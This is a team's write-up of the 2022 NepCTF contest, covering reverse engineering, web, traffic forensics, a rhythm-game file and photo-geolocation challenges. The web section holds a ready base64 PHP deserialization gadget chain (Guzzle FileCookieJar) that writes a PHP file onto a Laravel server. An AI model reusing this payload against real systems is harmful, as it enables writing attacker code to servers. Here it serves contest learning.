2022-NEPCTF-WriteUp
比赛信息
比赛昵称:ZERO
比赛积分:1218
比赛排名:60
解题过程
1.快来签到
修改IDA的配置文件,将hexrays.cfg里的MAX_FUNCSIZE数值调大,之后将文件拖入,再在options中的Graph里将Max number of nodes的数值改大,这时能在左下角看到Flag。
Flag:NepCTF{welc0me_t0_nepctf}
2.JustKidding
通过扫描网站,发现www.zip存在源码泄露,下载后对源码进行审计,发现存在反序列化漏洞。
通过直播时给出的hint,搜寻近期的laravel反序列化漏洞,构造pop链:TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czozNjoiAEd1enpsZUh0dHBcQ29va2llXENvb2tpZUphcgBjb29raWVzIjthOjE6e2k6MDtPOjI3OiJHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUiOjE6e3M6NDoiZGF0YSI7YToyOntzOjc6IkV4cGlyZXMiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo3OiJEaXNjYXJkIjtpOjA7fX19czozOToiAEd1enpsZUh0dHBcQ29va2llXENvb2tpZUphcgBzdHJpY3RNb2RlIjtOO3M6NDE6IgBHdXp6bGVIdHRwXENvb2tpZVxGaWxlQ29va2llSmFyAGZpbGVuYW1lIjtzOjEwOiIuL2luZm8ucGhwIjtzOjUyOiIAR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphcgBzdG9yZVNlc3Npb25Db29raWVzIjtiOjE7fQ==
之后访问info.php,在Environment中得到了Flag。
Flag:NepCTF{016aa038-cd18-496e-8648-0f71f3efad7f}
3.签到题
下载附件后用010editor打开,发现下面藏在zip格式的压缩包,将其提取出,通过在网上搜索得到的一次性解压代码进行解压得到最后一个压缩包,将其拖入010editor发现是伪加密,修改后解压,得到一个流量文件,拖入wireshack根据文件名提示:keyboard,猜想是根据usb流量来判断键盘的输入内容,参考链接。于是通过tshark提取出流量,再通过网上搜索的脚本进行信息还原,最终得到Flag。
Flag:nepctf{welcome_to_nepctf_2nd}
4.花花画画画花花
下载附件得到osz的文件,网上搜索后得知这是osu这款音游的谱子,下载osu并将附件导入,在Edit模式中逐帧观察得到Flag。
Flag:NepCTF{MASTER_OF_坏女人!}
5.馅饼?陷阱!
通过观察附件中的图片,可以在图片中得到关键信息:“琼”、“大禾寿司”、“如家宾馆”、“东北饺子城”。通过车牌上面的“琼”来锁定拍摄地区为海南,继续搜索“大禾寿司”通过谷歌地图的实景观察以及剩余信息的排查比对得到最终照片拍摄地:“海南省三亚市天涯区新风街”,根据分析,该银行为“光大银行”,搜索其官网得到Flag。
Flag:NepCTF{www.cebbank.com}
未解出题目的思路和猜想
1.DCTris
通过附件搜索以及题目暗示可知是Dreamcast的游戏,但尝试使用多种Dreamcast模拟器(如:DEmul、Redream、NullDC……)后仍无法打开游戏或者是打开后卡在开始界面…最终只能放弃。
2.DoubleHappiness
下载附件后,在010editor中查询到关于拍摄手机型号、拍摄时间等信息,通过查看图片属性得到具体经纬度以及大致地点等信息,通过浏览器进行关键词搜索,未发现相关有效信息…最终无奈放弃。